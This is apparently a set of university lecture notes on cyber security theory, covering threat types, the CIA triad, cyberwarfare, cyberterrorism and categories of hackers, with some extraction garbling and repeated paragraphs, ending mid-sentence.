Subject: Cyber Security (Theory)

Code: PEC- CS702E and PEC- IT702F

Introduction to Cyber Security

What is Cyber Security?

Cyber Security is a process that’s designed to protect networks and devices

from external threats. Cyber Security is a technique of protecting internet-
connected systems such as computers, servers, mobile devices, electronic
systems, networks, and data from malicious attacks is known as cyber security.
We can divide cyber security into two parts one is cyber, and the other is
security. Cyber refers to the technology that includes systems, networks,
programs, and data. And security is concerned with the protection of systems,
networks, applications, and information. In some cases, it is also called
electronic information security or information technology security.

Some other definitions of cyber security are:

"Cyber Security is the body of technologies, processes, and practices

designed to protect networks, devices, programs, and data from attack,
theft, damage, modification or unauthorized access."

"Cyber Security is the set of principles and practices designed to protect

our computing resources and online information against threats."

Types of Cyber Security

Every organization's assets are the combinations of a variety of different

systems. These systems have a strong cybersecurity posture that requires
coordinated efforts across all of its systems. Therefore, we can categorize
cybersecurity in the following sub-domains:

o Network Security: It involves implementing the hardware and software

to secure a computer network from unauthorized access, intruders,
attacks, disruption, and misuse. This security helps an organization to
protect its assets against external and internal threats.
o Application Security: It involves protecting the software and devices
from unwanted threats. This protection can be done by constantly
updating the apps to ensure they are secure from attacks. Successful
security begins in the design stage, writing source code, validation,
threat modeling, etc., before a program or device is deployed.
o Information or Data Security: It involves implementing a strong data
storage mechanism to maintain the integrity and privacy of data, both in
storage and in transit.
o Identity management: It deals with the procedure for determining the
level of access that each individual has within an organization.
o Operational Security: It involves processing and making decisions on
handling and securing data assets.
o Mobile Security: It involves securing the organizational and personal
data stored on mobile devices such as cell phones, computers, tablets,
and other similar devices against various malicious threats. These threats
are unauthorized access, device loss or theft, malware, etc.
o Cloud Security: It involves in protecting the information stored in the
digital environment or cloud architectures for the organization. It uses
various cloud service providers such as AWS, Azure, Google, etc., to
ensure security against multiple threats.
o Disaster Recovery and Business Continuity Planning: It deals with the
processes, monitoring, alerts, and plans to how an organization
responds when any malicious activity is causing the loss of operations or
data. Its policies dictate resuming the lost operations after any disaster
happens to the same operating capacity as before the event.
o User Education: It deals with the processes, monitoring, alerts, and
plans to how an organization responds when any malicious activity is
causing the loss of operations or data. Its policies dictate resuming the
lost operations after any disaster happens to the same operating
capacity as before the event.
 Importance and challenges in Cyber Security

Importance of Cyber Security

Today we live in a digital era where all aspects of our lives depend on the
network, computer and other electronic devices, and software applications. All
critical infrastructure such as the banking system, healthcare, financial
institutions, governments, and manufacturing industries use devices
connected to the Internet as a core part of their operations. Some of their
information, such as intellectual property, financial data, and personal data,
can be sensitive for unauthorized access or exposure that could have negative
consequences. This information gives intruders and threat actors to infiltrate
them for financial gain, extortion, political or social motives, or just vandalism.

Cyber-attack is now an international concern that hacks the system, and other
security attacks could endanger the global economy. Therefore, it is essential
to have an excellent cyber security strategy to protect sensitive information
from high-profile security breaches. Furthermore, as the volume of cyber-
attacks grows, companies and organizations, especially those that deal with
information related to national security, health, or financial records, needs to
use strong cyber security measures and processes to protect their sensitive
business and personal information.

Protecting Sensitive Data:

With the increase in digitalization, data is becoming more and more valuable.
Cybersecurity helps protect sensitive data such as personal information,
financial data, and intellectual property from unauthorized access and theft.

Prevention of Cyber Attacks:

Cyber attacks, such as Malware infections, Ransomware, Phishing,

and Distributed Denial of Service (DDoS) attacks, can cause significant
disruptions to businesses and individuals. Effective cybersecurity measures
help prevent these attacks, reducing the risk of data breaches, financial losses,
and operational disruptions.

Safeguarding Critical Infrastructure:

Critical infrastructure, including power grids, transportation systems,
healthcare systems, and communication networks, heavily relies on
interconnected computer systems. Protecting these systems from cyber
threats is crucial to ensure the smooth functioning of essential services and
prevent potential disruptions that could impact public safety and national
security.

Maintaining Business Continuity:

Cyber attacks can cause significant disruption to businesses, resulting in lost

revenue, damage to reputation, and in some cases, even shutting down the
business. Cybersecurity helps ensure business continuity by preventing or
minimizing the impact of cyber attacks.

Compliance with Regulations:

Many industries are subject to strict regulations that require organizations to

protect sensitive data. Failure to comply with these regulations can result in
significant fines and legal action. Cybersecurity helps ensure compliance with
regulations such as HIPAA, GDPR, and PCI DSS.

Protecting National Security:

Cyber attacks can be used to compromise national security by targeting

critical infrastructure, government systems, and military installations.
Cybersecurity is critical for protecting national security and preventing cyber
warfare.

Preserving Privacy:

In an era where personal information is increasingly collected, stored, and

shared digitally, cybersecurity is crucial for preserving privacy. Protecting
personal data from unauthorized access, surveillance, and misuse helps
maintain individuals’ privacy rights and fosters trust in digital services.

Challenges of Cyber security:

Constantly Evolving Threat Landscape:

Cyber threats are constantly evolving, and attackers are becoming increasingly
sophisticated. This makes it challenging for cybersecurity professionals to keep
Cyberspace
Cyberspace refers to the virtual computer world, and more specifically, an
electronic medium that is used to facilitate online communication. Cyberspace
typically involves a large computer network made up of many worldwide
computer sub-networks that employ TCP/IP protocol to aid in communication
and data exchange activities.

Cyberspace is a concept describing a widespread interconnected digital

technology. The term entered popular culture from science fiction and the arts
but is now used by technology strategists, security professionals,
governments, military and industry leaders and entrepreneurs to describe the
domain of the global technology environment, commonly defined as standing
for the global network of interdependent information technology
infrastructures, telecommunications networks and computer processing
systems.

Others consider cyberspace to be just a notional environment in which

communication over computer networks occurs. The word became popular in
the 1990s when the use of the Internet, networking, and digital
communication were all growing dramatically; the term cyberspace was able
to represent the many new ideas and phenomena that were emerging.

Cyberspace’s core feature is an interactive and virtual environment for a broad

range of participants. In the common IT lexicon, any system that has a
significant user base or even a well-designed interface can be thought to be
“cyberspace.”

Cyber Threats
A cybersecurity threat is the threat of a malicious attack by an individual or
organization attempting to gain access to a computer network, corrupt data,
or steal confidential information. An information security threat is an attack
that pertains directly to the IT stakeholders and your organization’s computer
networks.

No organization is immune from cyber attacks and data breaches. Some

attacks can even destroy computer systems.

Cyber threats also refer to the possibility of a successful cyber attack that aims
to gain unauthorized access, damage, disrupt, or steal an information
technology asset, computer network, intellectual property, or any other form
of sensitive data. Cyber threats can come from within an organization by
trusted users or from remote locations by unknown parties.

What Are the Top Information Security Threats?

To answer this question, one first needs to understand the difference between
infosec and cybersecurity, as well as the types of threats you’ll face. This
includes both the information security threats that exist today, as well as the
new and emerging threats sure to plague your enterprise tomorrow.

Malware

The most common cyberattack is malicious software, more commonly known

as malware. Malware includes spyware, ransomware, backdoors, trojans,
viruses, and worms.

• Spyware allows attackers to obtain information about your computer

activities by transmitting data covertly from your hard drive.
• Ransomware blocks access to files on a device, rendering any files (and
the systems that rely on them) unavailable. Usually, malicious actors
demand a cash ransom in exchange for a decryption key.
• A backdoor circumvents routine authentication procedures to access a
system. This gives the attacker remote access to resources within an
application, such as databases and file servers, and allows malicious
actors to issue system commands and update malware remotely.
• Trojans are malware or code that acts as a legitimate application or file
to trick you into loading and executing the malware on your device. A
trojan’s goal is to damage or steal your organization’s data or to inflict
some other harm on your network.
• A computer virus is malicious code designed to spread from device to
device. These self-copying threats are usually intended to damage a
machine or steal data.
• Worms are malware that spread copies of themselves from computer to
computer without human interaction. They do not need to attach
themselves to a software program to cause damage.

Malware is usually installed into the system when the user opens a malicious
link or email. Once installed, malware can block access to critical components
of your network, damage your system, and export confidential information to
destinations unknown.
Your organization can prevent malware-based cyber attacks by:

• Using reputable antivirus and anti-malware solutions, email spam filters,

and endpoint security solutions.
• Ensuring that your cybersecurity updates and patches are all up to date.
• Requiring your employees to undergo regular cybersecurity awareness
training to teach them how to avoid suspicious websites and to avoid
engaging with suspicious emails.
• Limiting user access and application privileges.

Phishing and spear-phishing

Phishing is a type of attack that attempts to trick users into giving over
sensitive data such as usernames and passwords, bank account information,
Social Security numbers, and credit card data.

Typically hackers send out phishing emails that seem to come from trusted
senders, such as PayPal, eBay, financial institutions, or friends and co-workers.
The bogus messages try to get users to click on links in the emails, directing
users to fraudulent websites that ask for personal information or install
malware on their devices.

Opening attachments sent via phishing emails can also install malware or
allow hackers to control your devices remotely.

Spear-phishing is a more sophisticated form of phishing attack, where

cybercriminals target only privileged users, such as system administrators or
C-suite executives. The attackers might use details from a person’s social
media accounts to seem even more legitimate to the target.

Other types of phishing can include smishing, vishing, clone phishing, domain
spoofing, URL phishing, watering hole phishing, and evil twin phishing. All can
be costly.

Organizations can do several things to reduce the chances of phishing:

• Implement cybersecurity awareness training for every employee.

• Emphasize the importance of phishing reporting.
• Run random phishing simulations.
• Push HTTPS on your website to create secure, encrypted connections.
• Institute access management policies and procedures.
• Use reliable email and spam filters.
 • Require two-factor authentication.
• Use email encryption and email signing certificates.

Man-in-the-middle (MiTM) attacks

Man-in-the-middle attacks occur when malicious actors insert themselves into

the middle of a two-party communication. Once the attacker intercepts the
incoming message, they filter and steal sensitive information and then returns
different responses to the original user.

Sometimes malicious actors set up fake Wi-Fi networks or install malware on

users’ computers or networks. Also called eavesdropping attacks, MiTM
attacks aim to access your business or customer data.

Distributed denial-of-service (DDoS)

A DDoS attack aims to take down a company’s website by overwhelming its

servers with requests. It’s analogous to calling a company’s phone number
constantly so that legitimate callers only get a busy signal and never get
through.

In this attack, requests come from hundreds or thousands of IP addresses that

have probably also been compromised and tricked into continuously
requesting a company’s website.

A DDoS attack can overload your servers, slowing them down significantly or
temporarily taking them offline. These shutdowns prevent customers from
accessing your website and completing orders.

Structured Query Language (SQL) injection

SQL injection attacks occur when cybercriminals attempt to access databases

by uploading malicious SQL scripts. Once successful, the malicious actor can
view, change, or delete data stored in the SQL database.

Domain Name System (DNS) attack

A DNS attack is a cyberattack where cybercriminals exploit vulnerabilities in

the DNS. The attackers leverage the DNS vulnerabilities to divert site visitors
to malicious pages (DNS hijacking) and exfiltrate data from compromised
systems (DNS tunneling).
Insider threats

Insider threats occur when an individual within an organization either

mistakenly or purposefully allows access to crucial secure networks. This can
happen when an employee doesn’t follow proper information security
protocols and clicks on a phishing link or installs malware. They may also
accidentally email customer data to an unsecure third party or grant
unauthorized access to an ill-intentioned actor.

Drive-By download attack

A drive-by download attack occurs when an individual visits a website and a

piece of code is installed without their permission. This is a common
cybercrime that allows the criminal to install a Trojan or malware, or steal
information without the individual’s knowledge.

What Are Common Sources of Cyber Threats?

Understanding threat actors and their tactics, techniques, and procedures
(“TTPs”) is essential to respond effectively to any cyberattack. Attackers can
include:

• Nation-states. Cyber attacks by a nation can disrupt communications,

military activities, and everyday life.
• Organized crime. Criminal groups aim to infiltrate systems or networks
for financial gain. These groups use phishing, spam, spyware, and
malware to conduct identity theft, online fraud, and system extortion.
• Hackers. Hackers employ various cyber techniques to breach defenses
and exploit vulnerabilities in a computer system or network. They are
usually motivated by personal gain, revenge, stalking, financial gain, or
political activism. Hackers may develop new threats for the hacker
community’s thrill of challenge or bragging rights.
• Terrorist groups. Terrorists conduct cyberattacks to destroy, infiltrate, or
exploit critical infrastructure to threaten national security, compromise
military equipment, disrupt the economy, and cause mass casualties.
• Insiders with malicious intent. Insiders can be workers, contractors,
third-party suppliers, or other business partners who have lawful access
to company resources but abuse it to steal or destroy data for their own
or others’ financial or personal advantage.
Cyberwarfare
Cyberwarfare is the use of cyber attacks against an enemy state, causing
comparable harm to actual warfare and/or disrupting vital computer systems.
Some intended outcomes could be espionage, sabotage, propaganda,
manipulation or economic warfare.
There is significant debate among experts regarding the definition of
cyberwarfare, and even if such a thing exists. One view is that the term is a
misnomer since no cyber attacks to date could be described as a war. An
alternative view is that it is a suitable label for cyber attacks which cause
physical damage to people and objects in the real world.
Many countries including the United States, United
Kingdom, Russia, China, Israel, Iran, and North Korea have active cyber
capabilities for offensive and defensive operations. As states explore the use of
cyber operations and combine capabilities, the likelihood of physical
confrontation and violence playing out as a result of, or part of, a cyber
operation is increased. However, meeting the scale and protracted nature of
war is unlikely, thus ambiguity remains.
The first instance of kinetic military action used in response to a cyber-attack
resulting in the loss of human life was observed on 5 May 2019, when
the Israel Defense Forces targeted and destroyed a building associated with
an ongoing cyber-attack.
CIA Triad
What is the CIA Triad?
The three letters in "CIA triad" stand for Confidentiality, Integrity, and
Availability. The CIA triad is a common model that forms the basis for the
development of security systems. They are used for finding vulnerabilities and
methods for creating solutions.
The confidentiality, integrity, and availability of information is crucial to the
operation of a business, and the CIA triad segments these three ideas into
separate focal points. This differentiation is helpful because it helps guide
security teams ass they pinpoint the different ways in which they can address
each concern.
Ideally, when all three standards have been met, the security profile of the
organization is stronger and better equipped to handle threat incidents.

Confidentiality
Confidentialityy involves the efforts of an organization to make sure data is
kept secret or private. To accomplish this, access to information must be
controlled to prevent the unauthorized sharing of data
data—whether
whether intentional
or accidental. A key component of maintainin
maintaining
g confidentiality is making sure
that people without proper authorization are prevented from accessing assets
important to your business. Conversely, an effective system also ensures that
those who need to have access have the necessary privileges.
For example,
mple, those who work with an organization’s finances should be able
to access the spreadsheets, bank accounts, and other information related to
the flow of money. However, the vast majority of other employees employees—and
perhaps even certain executives—may
executives not be granted access. To ensure these
policies are followed, stringent restrictions have to be in place to limit who can
see what.
There are several ways confidentiality can be compromised. This may involve
direct attacks aimed at gaining access to systems the a attacker
ttacker does not have
the rights to see. It can also involve an attacker making a direct attempt to
infiltrate an application or database so they can take data or alter it.
These direct attacks may use techniques such as man-in-the the-middle (MITM)
attacks,, where an attacker positions themselves in the stream of information
to intercept data and then either steal or alter it. Some attackers engage in
other types of network
rk spying to gain access to credentials. In some cases, the
attacker will try to gain more system privileges to obtain the next level of
clearance.
However, not all violations of confidentiality are intentional. Human error or
insufficient security controls
controls may be to blame as well. For example, someone
may fail to protect their password—either
password either to a workstation or to log in to a
restricted area. Users may share their credentials with someone else, or they
may allow someone to see their login while they enter it. In other situations, a
user may not properly encrypt a communication, allowing an attacker to
intercept their information. Also, a thief may steal hardware, whether an entire
computer or a device used in the login process and use it to access
confidential
tial information.
To fight against confidentiality breaches, you can classify and label restricted
data, enable access control policies, encrypt data, and use multi-factor
multi
authentication (MFA) systems. It is also advisable to ensure that all in the
organization
ation have the training and knowledge they need to recognize the
dangers and avoid them.

Integrity
Integrity involves making sure your data is trustworthy and free from
tampering. The integrity of your data is maintained only if the data is
authentic, accurate, and reliable.
For example, if your company provides information about senior managers on
yourr website, this information needs to have integrity. If it is inaccurate, those
visiting the website for information may feel your organization is not
trustworthy. Someone with a vested interest in damaging the reputation of
your organization may try to ha hack
ck your website and alter the descriptions,
photographs, or titles of the executives to hurt their reputation or that of the
company as a whole.
Compromising integrity is often done intentionally. An attacker may bypass an
intrusion detection system (IDS), change file configurations to allow
unauthorized access, or alter the logs kept by the system to hide the attack.
Integrity may also be violated by accident. Someone may accidentally enter
the wrong code or make another kind of careless mistake. Also, if the
company’s security policies, protections, and procedures are inadequate,
integrity can be violated without any one person in the organization
accountable for the blame.
To protect the integrity of your data, you can use hashing, encryption, digital
certificates,
tificates, or digital signatures. For websites, you can employ trustworthy
certificate authorities (CAs) that verify the authenticity of your website so
visitors know they are getting the site they intended to visit.
A method for verifying integrity is non-repudiation,
no repudiation, which refers to when
something cannot be repudiated or denied. For example, if employees in your
company use digital signatures when sending emails, the fact that the email
came from them cannot be denied. Also, the recipient cannot deny that
tha they
received the email from the sender.

Availability
Even if data is kept confidential and its integrity maintained, it is often useless
unless it is available to those in the organization and the customers they serve.
This means that systems, networks, and applications must be functioning as
they should and when they should. Also, individuals with access to specific
information must be able to consume it when they need to, and getting to the
data should not take an inordinate amount of time.
If, for example,
mple, there is a power outage and there is no disaster recovery
system in place to help users regain access to critical systems, availability will
be compromised. Also, a natural disaster like a flood or even a severe
snowstorm may prevent users from getting
getting to the office, which can interrupt
the availability of their workstations and other devices that provide business-
business
critical information or applications. Availability can also be compromised
through deliberate acts of sabotage, such as the use of denial-of-service
denial (DoS)
attacks or ransomware.
To ensure availability, organizations can use redundant networks, servers, and
applications. These can be programmed to become available when whe the
primary system has been disrupted or broken. You can also enhance
availability by staying on top of upgrades to software packages and security
systems. In this way, you make it less likely for an application to malfunction or
for a relatively new threat
eat to infiltrate your system. Backups and full disaster
recovery plans also help a company regain availability soon after a negative
event.

Why Should You Use the CIA Triad?

The CIA triad provides a simple yet comprehensive high-level
high level checklist for the
evaluation of your security procedures and tools. An effective system satisfies
all three components: confidentiality, integrity, and availability. An information
informa
security system that is lacking in one of the three aspects of the CIA triad is
insufficient.
The CIA security triad is also valuable in assessing what went wrong
wrong—and
what worked—after
after a negative incident. For example, perhaps availability was
compromised
omised after a malware attack such as ransomware, but the systems in
place were still able to maintain the confidentiality of important information.
This data can be used to address weak points and replicate successful policies
and implementations.

When Should
hould You Use the CIA Triad?
You should use the CIA triad in the majority of security situations, particularly
because each component is critical. However, it is particularly helpful when
developing systems around data classification and managing permissions
permissio and
access privileges. You should also stringently employ the CIA triad when
addressing the cyber vulnerabilities of your organization. It can be a powerful
tool in disrupting the Cyber Kill Chain, which refers to the process of targeting
and executing a cyberattack. The CIA security triad can help you hone in on
what attackers may be after and then implement policies and tools to
adequately protect those assets.
In addition, the CIA triad can be used when training employees regarding
cybersecurity. You can use hypothetical scenarios or real-life case studies to
help employees think in terms of the maintenance of confidentiality, integrity,
and availability of information and systems.

Cyber Terrorism
Cyberterrorism is the use of the Internet to conduct violent acts that result in,
or threaten, the loss of life or significant bodily harm, in order to achieve
political or ideological gains through threat or intimidation. Acts of deliberate,
large-scale disruption of computer networks, especially of personal computers
attached to the Internet by means of tools such as computer viruses,
computer worms, phishing, malicious software, hardware methods,
programming scripts can all be forms of internet terrorism. Cyberterrorism is a
controversial term.[citation needed] Some authors opt for a very narrow
definition, relating to deployment by known terrorist organizations of
disruption attacks against information systems for the primary purpose of
creating alarm, panic, or physical disruption. Other authors prefer a broader
definition, which includes cybercrime. Participating in a cyberattack affects the
terror threat perception, even if it isn't done with a violent approach. By some
definitions, it might be difficult to distinguish which instances of online
activities are cyberterrorism or cybercrime.
Cyberterrorism can be also defined as the intentional use of computers,
networks, and public internet to cause destruction and harm for personal
objectives. Experienced cyberterrorists, who are very skilled in terms of
hacking can cause massive damage to government systems and might leave a
country in fear of further attacks. The objectives of such terrorists may be
political or ideological since this can be considered a form of terror.
There is much concern from government and media sources about potential
damage that could be caused by cyberterrorism, and this has prompted
efforts by government agencies such as the Federal Bureau of Investigation
(FBI) and the Central Intelligence Agency (CIA) to put an end to cyber attacks
and cyberterrorism.
There have been several major and minor instances of cyberterrorism. Al-
Qaeda utilized the internet to communicate with supporters and even to
recruit new members. Estonia, a Baltic country which is constantly evolving in
terms of technology, became a battleground for cyberterrorism in April 2007
after disputes regarding the relocation of a WWII soviet statue located in
Estonia's capital Tallinn.
Cyberterrorism can be also defined as the intentional use of computers,
networks, and public internet to cause destruction and harm for personal
objectives. Experienced cyberterrorists, who are very skilled in terms of
hacking can cause massive damage to government systems and might leave a
country in fear of further attacks. The objectives of such terrorists may be
political or ideological since this can be considered a form of terror.
There is much concern from government and media sources about potential
damage that could be caused by cyberterrorism, and this has prompted
efforts by government agencies such as the Federal Bureau of Investigation
(FBI) and the Central Intelligence Agency (CIA) to put an end to cyber attacks
and cyberterrorism.
There have been several major and minor instances of cyberterrorism. Al-
Qaeda utilized the internet to communicate with supporters and even to
recruit new members. Estonia, a Baltic country which is constantly evolving in
terms of technology, became a battleground for cyberterrorism in April 2007
after disputes regarding the relocation of a WWII soviet statue located in
Estonia's capital Tallinn.

Cyber Security of Critical Infrastructure

What is critical infrastructure cybersecurity?

Critical infrastructure cybersecurity refers to the programs, protocols, and
technology used to protect the critical infrastructure of nation states. Cyber
criminals frequently target national infrastructure such as utilities,
transportation systems, financial sectors, food and agriculture systems, energy
companies, and other operations that provide essential services to
governments and their citizens.
The maintenance and reliability of cybersecurity systems and critical
infrastructure are essential to the security of our nation. With advancements in
cyberphysical and cyberinformation systems (known as the Internet of Things
(IoT)), unparalleled opportunities for improved monitoring, operations and
reliability of systems have been made readily available to all aspects of
personal, public, private and commercial entities.
SMRP believes in a sound cyber-defense strategy and that research into the
potential threat through the first line of defense and the inter-connectivity
between companies, vendors, contractors, and subcontractors is the first-step
towards better understanding the threats posed through IoT devices.
SMRP’s policy on how maintenance and reliability of cybersecurity systems
and critical infrastructure are essential to protecting our nation’s economy and
infrastructure.
SMRP is a member of the National Network led by the Department of
Homeland Security’s (DHS) Stop.Think.Connect.™ Campaign. The
Stop.Think.Connect.™ Campaign. is a national public awareness campaign
aimed at increasing the understanding of cyber threats and empowering the
American public to be safer and more secure online.

Cyber Attacks in Organizations:

Challenges and Implications
Introduction:

In today's digital age, organizations face a constant threat from cyber attacks
that can have severe consequences on their operations, reputation, and
financial stability. This newsletter explores the challenges organizations
encounter in dealing with cyber attacks and highlights the implications for
their security posture.

I. Evolving Threat Landscape:

The rapid advancement of technology has led to a parallel rise in sophisticated

cyber threats. Hackers and cybercriminals employ various techniques such as
malware, phishing, ransomware, and social engineering to exploit
vulnerabilities in organizational systems. The ever-evolving nature of these
threats poses a significant challenge for organizations to keep up with the
latest security measures.

II. Insider Threats:

One of the most challenging aspects of cyber attacks for organizations is the
presence of insider threats. Employees or former employees with malicious
intent can compromise sensitive data, sabotage systems, or provide
unauthorized access to cybercriminals. Mitigating insider threats requires a
delicate balance between trust and security, as organizations must implement
robust access controls, monitoring systems, and employee awareness
programs.

III. Data Breaches and Privacy Concerns:

Data breaches have become alarmingly common, leading to the exposure of

sensitive information and violating user privacy. Organizations must adhere to
strict data protection regulations, such as the General Data Protection
Regulation (GDPR) in the European Union, to safeguard customer data. The
financial and reputational damage resulting from data breaches can be
significant, necessitating proactive measures to prevent and respond to such
incidents.

IV. Resource Constraints:

Many organizations, particularly small and medium-sized enterprises, face

resource constraints when it comes to cybersecurity. Limited budgets and lack
of skilled personnel make it challenging to implement robust security
measures and maintain an effective security posture. Cybersecurity awareness
training, regular system updates, and investing in reliable security solutions
are crucial but often overlooked due to resource limitations.

V. Rapid Technological Advancements:

The rapid adoption of emerging technologies such as cloud computing, the

Internet of Things (IoT), and artificial intelligence (AI) brings new security
challenges for organizations. Integrating these technologies into existing
infrastructures without compromising security requires specialized knowledge
and expertise. Failure to address these challenges effectively can expose
organizations to vulnerabilities and potential cyber attacks.

VI. Incident Response and Recovery:

Cyber attacks can be disruptive, causing operational downtime and financial

losses. Organizations need to have well-defined incident response plans in
place to minimize the impact of attacks. Incident response teams should be
trained and equipped to detect, contain, and recover from security incidents
promptly. Regular testing and updating of incident response plans are critical
to ensure their effectiveness.

VII. Third-Party Risks:

Many organizations rely on third-party vendors and partners for various
services and support. However, these relationships can introduce additional
risks. Cyber attacks on third-party vendors can compromise organizational
systems and data. Organizations must conduct due diligence and establish
strong security protocols when engaging with third parties to mitigate these
risks.

VIII. Regulatory Compliance:

Organizations are subject to an increasing number of cybersecurity regulations

and compliance standards. Failure to comply with these requirements can
result in legal repercussions and reputational damage. Navigating the complex
landscape of regulatory compliance can be challenging, particularly for
multinational organizations operating in different jurisdictions with varying
data protection laws.

Conclusion:

Cyber attacks pose significant challenges for organizations across all sectors.
To mitigate these threats, organizations must stay vigilant, prioritize
cybersecurity measures, and invest in robust infrastructure, personnel training,
and incident response capabilities. Proactive risk management, collaboration
with security experts, and adherence to regulatory frameworks are essential to
safeguard sensitive data and maintain the trust of customers and stakeholders
in today's digital landscape.
 Hackers and Cyber Crimes

Introduction
Computers and the Internet have changed the work environment of the world beyond
imagination. Computers on taking over a major part of our lives, all our data has got transferred
from records and ledgers to computers. Though this kind of shift in working has reduced the
physical burden on workers it has also increased the chances of data theft. People involved in
stealing data or harming the systems are knowledgeable people with wrong intentions known as
Hackers. There are different types of hackers. Let’s take a look at how many types of hackers are
there and the types of hacker attacks and techniques.

Who is a Hacker?

A hacker is ideally a person who is skilled in information technology. He uses his technical
knowledge to overcome an obstacle or sometimes even achieve a goal within a computerized
system. However, in recent times, the term hacker is always associated with a security hacker –
someone who is always on the lookout for ways to acquire and exploit sensitive personal,
financial and organizational information, which is otherwise not accessible to them. Legitimate
figures often use hacking for legal purposes.

How does Hacking Work?

Hackers are highly skilled in breaching securities to gain unauthorized access to phones, tablets,
computers, IoT devices, networks, or the networking system of an entire organization. They are
generally very proficient in exploiting weaknesses in network security, taking advantage of the
same. These weaknesses can be technical or social in nature.

• Technical weaknesses: Hackers are extremely talented in exploiting software

vulnerabilities or weak security practices. They do this to gain unauthorized access or
even sometimes to inject malware that would crumple the entire system.
• Social weaknesses: This kind of social engineering is done to convince those with
privileged access to click on malicious links, open infected files, or reveal personal
information. This allows them access to otherwise hardened infrastructures.

Types Of Hackers
Computers and the Internet have changed the work environment of the world beyond
imagination. Computers on taking over a major part of our lives, all our data has got transferred
from records and ledgers to computers. Though this kind of shift in working has reduced the
physical burden on workers it has also increased the chances of data theft. People involved in
stealing data or harming the systems are knowledgeable people with wrong intentions known as
Hackers. There are different types of hackers. Let’s take a look at how many types of hackers are
there and the types of hacker attacks and techniques.

1. White Hat / Ethical Hackers

2. Black Hat Hackers
 3. Gray Hat Hackers
4. Script Kiddies
5. Green Hat Hackers
6. Blue Hat Hackers
7. Red Hat Hackers
8. State/Nation Sponsored Hackers
9. Hacktivist
10. Malicious insider or Whistleblower

1) White Hat Hackers

White hat hackers are types of hackers who’re professionals with expertise in cybersecurity.
They are authorized or certified to hack the systems. These White Hat Hackers work for
governments or organizations by getting into the system. They hack the system from the
loopholes in the cybersecurity of the organization. This hacking is done to test the level of
cybersecurity in the organization. By doing so, they identify the weak points and fix them to
avoid attacks from external sources. White hat hackers work per the rules and regulations the
government sets. White hat hackers are also known as ethical hackers.

Motives & Aims: The goals of these types of hackers are helping businesses and an appetite for
detecting gaps in networks’ security. They aim to protect and assist companies in the ongoing
battle against cyber threats. A White Hat hacker is any individual who will help protect the
company from raising cyber crimes. They help enterprises create defences, detect vulnerabilities,
and solve them before other cybercriminals can find them.

2) Black Hat Hackers

Black hat hackers are also knowledgeable computer experts but with the wrong intention. They
attack other systems to get access to systems where they do not have authorized entry. On
gaining entry they might steal the data or destroy the system. The hacking practices these types
of hackers use depend on the individual’s hacking capacity and knowledge. As the intentions of
the hacker make the hacker a criminal. The malicious action intent of the individual cannot be
gauged either can the extent of the breach while hacking

Motives & Aims: To hack into organizations’ networks and steal bank data, funds or sensitive
information. Normally, they use the stolen resources to profit themselves, sell them on the black
market or harass their target company.

3) Gray Hat Hackers

The intention behind the hacking is considered while categorizing the hacker. The Gray hat
hacker falls between the black and white hat hackers. They are not certified, hackers. These types
of hackers work with either good or bad intentions. The hacking might be for their gain. The
intention behind hacking decides the type of hacker. If the intention is for personal gain, the
hacker is considered a gray hat hacker.

Motives & Aims: The difference is, they don’t want to rob people nor want to help people in
particular. Rather, they enjoy experimenting with systems to find loopholes, crack defenses, and
generally find a fun hacking experience.

4) Script Kiddies
It is a known fact that half knowledge is always dangerous. The Script Kiddies are amateurs
types of hackers in the field of hacking. They try to hack the system with scripts from other
fellow hackers. They try to hack the systems, networks, or websites. The intention behind the
hacking is just to get the attention of their peers. Script Kiddies are juveniles who do not have
complete knowledge of the hacking process.

Motives & Aims: One standard Kiddie Script attack is a DoS (Denial of Service) or DDoS
attack (Distributed Denial of Service). This simply means that an IP address is flooded with too
much excessive traffic that it collapses. Consider several Black Friday shopping websites, for
instance. It creates confusion and prevents someone else uses the service.

5) Green Hat Hackers

Green hat hackers are types of hackers who learn the ropes of hacking. They are slightly
different from the Script Kiddies due to their intention. The intent is to strive and learn to
become full-fledged hackers. They are looking for opportunities to learn from experienced
hackers.

6) Blue Hat Hackers

Blue Hat Hackers are types of hackers who’re similar to Script Kiddies. The intent to learn is
missing. They use hacking as a weapon to gain popularity among their fellow beings. They use
hacking to settle scores with their adversaries. Blue Hat Hackers are dangerous due to the intent
behind the hacking rather than their knowledge.

7) Red Hat Hackers

Red Hat Hackers are synonymous with Eagle-Eyed Hackers. They are the types of hackers
who’re similar to white hackers. The red hat hackers intend to stop the attack of black hat
hackers. The difference between red hat hackers and white hat hackers is that the process of
hacking through intention remains the same. Red hat hackers are quite ruthless when dealing
with black hat hackers or counteracting malware. The red hat hackers continue to attack and may
end up having to replace the entire system setup.

Above are 7 types of hackers broadly referred to in the cybersecurity world.

The three types of hackers listed below work in different capacities.

8) State/Nation Sponsored Hackers

Government appoints hackers to gain information about other countries. These types of hackers
are known as State/Nation sponsored hackers. They use their knowledge to gain confidential
information from other countries to be well prepared for any upcoming danger to their country.
The sensitive information aids in being on top of every situation but also in avoiding upcoming
danger. They report only to their governments.

9) Hacktivist

These types of hackers intend to hack government websites. They pose themselves as activists,
so known as a hacktivist. Hacktivists can be an individual or a bunch of nameless hackers whose
intent is to gain access to government websites and networks. The data gained from government
files accessed are used for personal political or social gain.

10) Malicious insider or Whistleblower

These types of hackers include individuals working in an organization who can expose
confidential information. The intent behind the exposure might be a personal grudge against the
organization, or the individual might have come across illegal activities within the organization.
The reason for exposure defines the intent behind the exposure. These individuals are known as
whistleblowers.

Crackers
We have learnt about hackers, how they work, what their interests are and what they do. Now
when we talk of crackers, we must know that crackers are also hackers. But their ways of works
differ a lot. While a hacker works totally in the interest of a company or an individual, the
cracker works totally in the opposite manner. The purpose of a cracker is to break the security of
computers and networks. It is an illegal activity. They make use of their knowledge to make
personal gains and breach security across networks. They acquire extensive knowledge and
learning about computers, their programming, software, codes and languages and use them to
break into computers for criminal gains.

The crackers are also known as Black Hats. They gain access to the accounts of people
maliciously, and they can misuse the secured information across networks. They can steal credit
card information; they can destroy important files, disclose crucial data and information or
personal details and sell them for personal gains. Their purpose can range from little personal
gains to bigger criminal interests. They can make employees of a company divulge highly secure
information. They violate computer security. Once they have gained control over a system, they
can do anything like steal data, destroy it, use it to their advantage etc.

What interests these Crackers?

While some crackers are driven by sheer publicity of their abilities in the field of hacking,
some do it for criminal and malicious purposes. They intentionally breach the computer and
network security merely for profit, or maybe there is a challenge in it. They are interested in
gaining access to various programs and software without paying royalties. The only purpose they
have is illegal hacking leading to security problems. There may be theft from credit card holders’
accounts, important data may be lost, and secure information may be divulged. Some crackers
are interested in modifying the software by reverse engineering. And they do this merely for
